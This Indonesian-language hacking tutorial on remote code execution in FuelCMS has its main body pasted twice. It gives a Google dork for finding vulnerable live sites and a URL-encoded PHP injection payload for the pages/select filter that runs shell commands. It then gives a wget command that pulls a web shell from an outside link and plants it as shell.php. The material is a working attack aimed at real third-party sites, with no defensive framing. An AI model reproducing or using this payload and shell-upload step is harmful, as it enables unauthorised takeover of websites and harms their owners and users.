FuelCMS Remote Code Execution
Assalamualaikum
Say Hello Tod !
sebelum memulai, alangkah baiknya kalian mengenal apa itu RCE
Remote code execution (Bahasa Indonesia : Eksekusi kode jarak jauh) adalah kemampuan penyerang untuk mengakses perangkat komputasi orang lain dan membuat perubahan, di mana pun perangkat berbeda baik secara lokasi maupun geografis.
Kerentanan dapat memberikan penyerang dengan kemampuan untuk mengeksekusi kode berbahaya dan mengambil kendali penuh dari sistem yang terkena dampak. Biasanya penyerang dapat mengakses dengan hak istimewa “user” saat menjalankan aplikasi. Setelah mendapatkan akses ke sistem, penyerang akan sering berusaha untuk meningkatkan hak istimewa mereka (dari user ke super user atau root ).
Source : https://www.beritabebas.com/definisi/remote-code-execution-rce/
oke, langsung saja kita Mulai, pertama kalian Dorking dulu :v
======================================
Google Dork : intext:"FUEL CMS is developed with love by Daylight Studio © 2019 Daylight Studio LLC, All Rights Reserved."
Payload : fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"
======================================
Dorking Dolo..
masukkan payloadnya
Example : https://www.site.com/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"
untuk command ls -la bisa kalian ubah2
lalu View Source webnya,
ntar bakalan muncul list dari isi web tsb. (ls -la)
Jika ingin upload shell tinggal
wget https://linkshell -O shell.php
Akses Shell : site.com/shell.php
Say Hello Tod !
sebelum memulai, alangkah baiknya kalian mengenal apa itu RCE
Remote code execution (Bahasa Indonesia : Eksekusi kode jarak jauh) adalah kemampuan penyerang untuk mengakses perangkat komputasi orang lain dan membuat perubahan, di mana pun perangkat berbeda baik secara lokasi maupun geografis.
Kerentanan dapat memberikan penyerang dengan kemampuan untuk mengeksekusi kode berbahaya dan mengambil kendali penuh dari sistem yang terkena dampak. Biasanya penyerang dapat mengakses dengan hak istimewa “user” saat menjalankan aplikasi. Setelah mendapatkan akses ke sistem, penyerang akan sering berusaha untuk meningkatkan hak istimewa mereka (dari user ke super user atau root ).
Source : https://www.beritabebas.com/definisi/remote-code-execution-rce/
oke, langsung saja kita Mulai, pertama kalian Dorking dulu :v
======================================
Google Dork : intext:"FUEL CMS is developed with love by Daylight Studio © 2019 Daylight Studio LLC, All Rights Reserved."
Payload : fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"
======================================
Dorking Dolo..
masukkan payloadnya
Example : https://www.site.com/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"
untuk command ls -la bisa kalian ubah2
lalu View Source webnya,
ntar bakalan muncul list dari isi web tsb. (ls -la)
Jika ingin upload shell tinggal
wget https://linkshell -O shell.php
Akses Shell : site.com/shell.php
Sekian tutor dari gw, semoga bermanfaat
Bye...
Wassalamualaikum
